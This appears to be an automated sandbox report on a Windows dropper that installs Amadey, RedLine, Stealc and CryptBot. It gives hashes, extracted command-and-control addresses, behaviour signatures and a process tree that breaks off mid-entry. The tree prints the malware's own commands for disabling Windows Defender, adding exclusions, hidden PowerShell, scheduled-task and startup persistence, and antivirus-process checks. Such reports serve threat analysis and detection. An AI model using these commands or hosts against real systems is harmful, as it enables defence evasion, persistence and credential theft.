Analysis

  • max time kernel
    298s
  • max time network
    299s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    16-09-2024 05:01

General

  • Target

    3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe

  • Size

    1.8MB

  • MD5

    9731fffd7b478b386655c8b87eed24ac

  • SHA1

    92ad41f7bd9879774dc4e52e1781ccd8b328320e

  • SHA256

    3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e

  • SHA512

    1e7558535668bf98d6bb5dd34dc37778387d56572005a4179e78719f108ea468f88ec10143281b6b2d4291f7c370bedded6cd3ae4b3303c0b88d9739314f3bbb

  • SSDEEP

    49152:7LMeoAgVVqdZIOdOq1bch/o/VoI2mEPUDjjx7yZX:7YrAgVVq5zEHXPUD35yN

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

  • rc4.plain

    1
    a091ec0a6e22276a96a99c1d34ef679c

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

65.21.18.51:45580

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

stealc

Botnet

default

C2

http://91.202.233.158

Attributes
  • url_path

    /e96ea2db21fa9a1b.php

Extracted

Family

redline

Botnet

bundle

C2

185.215.113.67:15206

Extracted

Family

cryptbot

C2

fivevd5vs.top

analforeverlovyu.top

Attributes
  • url_path

    /v1/upload.php

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

C2

91.194.55.146:29862

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • CryptBot

    CryptBot is a C++ stealer that is widely distributed in bundles with other software.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 14 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious access to, or copying of, a web browser credential store.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Runs PowerShell with a hidden display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 28 IoCs
  • Identifies Wine through registry keys 2 TTPs 2 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.

  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 59 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 26 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 10 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 9 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 14 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1128
      • C:\Users\Admin\AppData\Local\Temp\3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe
        "C:\Users\Admin\AppData\Local\Temp\3fe959722443c1171b390de870518f3be721b0ccadd49f2fe1d89fd1ee07458e.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2336
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Modifies system certificate store
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:2056
          • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2252
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2324
          • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
            "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2820
            • C:\Users\Admin\AppData\Roaming\6InNj3SOTk.exe
              "C:\Users\Admin\AppData\Roaming\6InNj3SOTk.exe"
              5⤵
              • Executes dropped EXE
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2724
            • C:\Users\Admin\AppData\Roaming\bhh9YfYYwa.exe
              "C:\Users\Admin\AppData\Roaming\bhh9YfYYwa.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:952
          • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in Windows directory
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:2188
            • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
              "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2828
          • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:2080
          • C:\Users\Admin\AppData\Local\Temp\1000129001\2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000129001\2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks processor information in registry
            PID:2052
            • C:\Users\Admin\AppData\Local\Temp\service123.exe
              "C:\Users\Admin\AppData\Local\Temp\service123.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:2332
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
              5⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:2728
          • C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
            "C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2704
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:1840
          • C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
            "C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2812
          • C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
            "C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2764
          • C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe
            "C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of AdjustPrivilegeToken
            PID:2312
          • C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2412
          • C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe
            "C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"
            4⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            PID:576
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
              5⤵
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              PID:1660
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist
                6⤵
                • Enumerates processes with tasklist
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:2704
              • C:\Windows\SysWOW64\findstr.exe
                findstr /I "wrsa opssvc"
                6⤵
                  PID:1924
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  6⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1256
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                  6⤵
                    PID:2984
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c md 607698
                    6⤵
                    • System Location Discovery: System Language Discovery
                    PID:1020
                  • C:\Windows\SysWOW64\findstr.exe
                    findstr /V "MaskBathroomCompositionInjection" Participants
                    6⤵
                      PID:2268
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
                      6⤵
                        PID:896
                      • C:\Users\Admin\AppData\Local\Temp\607698\Waters.pif
                        Waters.pif Q
                        6⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:2940
                      • C:\Windows\SysWOW64\choice.exe
                        choice /d y /t 5
                        6⤵
                          PID:2428
                    • C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"
                      4⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • System Location Discovery: System Language Discovery
                      PID:2732
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:2736
                    • C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe
                      "C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"
                      4⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      PID:1444
                      • C:\Users\Admin\AppData\Local\Temp\7zS4B91.tmp\Install.exe
                        .\Install.exe
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:1980
                        • C:\Users\Admin\AppData\Local\Temp\7zS4D46.tmp\Install.exe
                          .\Install.exe /sdidaXH "385121" /S
                          6⤵
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Enumerates system info in registry
                          PID:2348
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                            7⤵
                              PID:3004
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                8⤵
                                • Indirect Command Execution
                                PID:1252
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                  9⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2652
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                    10⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2392
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                8⤵
                                • Indirect Command Execution
                                PID:2936
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                  9⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2300
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                    10⤵
                                      PID:1652
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                  8⤵
                                  • Indirect Command Execution
                                  PID:2576
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                    9⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:884
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                      10⤵
                                        PID:1388
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                    8⤵
                                    • Indirect Command Execution
                                    PID:2148
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                      9⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2872
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                        10⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2352
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                    8⤵
                                    • Indirect Command Execution
                                    • System Location Discovery: System Language Discovery
                                    PID:2696
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                      9⤵
                                        PID:2988
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                          10⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in System32 directory
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:276
                                          • C:\Windows\SysWOW64\gpupdate.exe
                                            "C:\Windows\system32\gpupdate.exe" /force
                                            11⤵
                                              PID:1472
                                    • C:\Windows\SysWOW64\forfiles.exe
                                      "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m ping.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                      7⤵
                                      • Indirect Command Execution
                                      PID:1664
                                      • C:\Windows\SysWOW64\cmd.exe
                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                        8⤵
                                          PID:2520
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                            9⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Drops file in System32 directory
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:868
                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                              10⤵
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2544
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        schtasks /CREATE /TN "bmbXFarNlpbNUcjZUs" /SC once /ST 05:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB\LEUXBcbvazrcGrF\MYkdETq.exe\" NE /SvdidN 385121 /S" /V1 /F
                                        7⤵
                                        • Drops file in Windows directory
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:1948
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2348 -s 592
                                        7⤵
                                        • Loads dropped DLL
                                        • Program crash
                                        PID:2412
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:2636
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F
                                3⤵
                                • System Location Discovery: System Language Discovery
                                • Scheduled Task/Job: Scheduled Task
                                PID:680
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit
                              2⤵
                              • Drops startup file
                              PID:1548
                          • C:\Windows\system32\taskeng.exe
                            taskeng.exe {ECACD0D0-A139-4215-AD14-73DAF2D955DB} S-1-5-21-4177215427-74451935-3209572229-1000:JSMURNPT\Admin:Interactive:[1]
                            1⤵
                              PID:328
                              • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                PID:2576
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                2⤵
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:236
                                • C:\Windows\system32\gpupdate.exe
                                  "C:\Windows\system32\gpupdate.exe" /force
                                  3⤵
                                    PID:1524
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Drops file in System32 directory
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1944
                                  • C:\Windows\system32\gpupdate.exe
                                    "C:\Windows\system32\gpupdate.exe" /force
                                    3⤵
                                      PID:944
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                    2⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Drops file in System32 directory
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2600
                                    • C:\Windows\system32\gpupdate.exe
                                      "C:\Windows\system32\gpupdate.exe" /force
                                      3⤵
                                        PID:1976
                                    • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                      C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:2364
                                    • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                      C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:2684
                                    • C:\Users\Admin\AppData\Local\Temp\service123.exe
                                      C:\Users\Admin\AppData\Local\Temp\/service123.exe
                                      2⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:448
                                  • C:\Windows\system32\taskeng.exe
                                    taskeng.exe {40D7808E-9DD2-433E-8180-4D32F932009B} S-1-5-18:NT AUTHORITY\System:Service:
                                    1⤵
                                      PID:884
                                      • C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB\LEUXBcbvazrcGrF\MYkdETq.exe
                                        C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB\LEUXBcbvazrcGrF\MYkdETq.exe NE /SvdidN 385121 /S
                                        2⤵
                                        • Executes dropped EXE
                                        • Drops file in System32 directory
                                        • Modifies data under HKEY_USERS
                                        PID:1176
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                          3⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:2984
                                          • C:\Windows\SysWOW64\forfiles.exe
                                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                            4⤵
                                            • Indirect Command Execution
                                            • System Location Discovery: System Language Discovery
                                            PID:2988
                                            • C:\Windows\SysWOW64\cmd.exe
                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                              5⤵
                                                PID:2696
                                                • \??\c:\windows\SysWOW64\reg.exe
                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                  6⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2548
                                            • C:\Windows\SysWOW64\forfiles.exe
                                              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                              4⤵
                                              • Indirect Command Execution
                                              • System Location Discovery: System Language Discovery
                                              PID:1728
                                              • C:\Windows\SysWOW64\cmd.exe
                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                5⤵
                                                  PID:2788
                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                    6⤵
